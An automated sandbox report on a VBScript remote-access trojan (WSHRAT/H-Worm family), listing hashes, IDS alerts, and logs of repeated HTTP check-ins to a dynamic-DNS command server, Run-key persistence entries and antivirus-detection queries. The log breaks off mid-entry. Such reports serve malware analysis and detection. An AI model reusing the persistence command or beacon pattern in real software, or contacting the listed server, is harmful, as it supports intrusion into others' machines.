Summary | ZeroBOX

wp.vbs

Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 2, 2023, 6:33 p.m. Sept. 2, 2023, 6:35 p.m.
Size 231.1KB
Type Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
MD5 788d9b6fd542ea9680d7fd61e3424aec
SHA256 7384901adc43848e36b00b3a5bd4a1c9743533d81e4fc33f8bcdec0e8e9a0077
CRC32 5C1AF070
ssdeep 384:9uZ8qcLILoneu0BQVfoes0R1rTuDwPMW5RxDCOzAg0Y2gD2GBm843E4LnLuVSou2:9uZ8jdrVSRJc
Yara None matched

Name Response Post-Analysis Lookup
chongmei33.publicvm.com 172.111.147.88
IP Address Status Action
164.124.101.2 Active Moloch
172.111.147.88 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2034457 ET POLICY Observed DNS Query to DynDNS Domain (publicvm .com) Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49163 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49163 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49162 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49162 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49162 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 172.111.147.88:7045 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 172.111.147.88:7045 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 172.111.147.88:7045 2042823 ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
domain chongmei33.publicvm.com
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2425495
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425485
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425483
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425501
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp reg_value wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
wmi select * from antivirusproduct
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

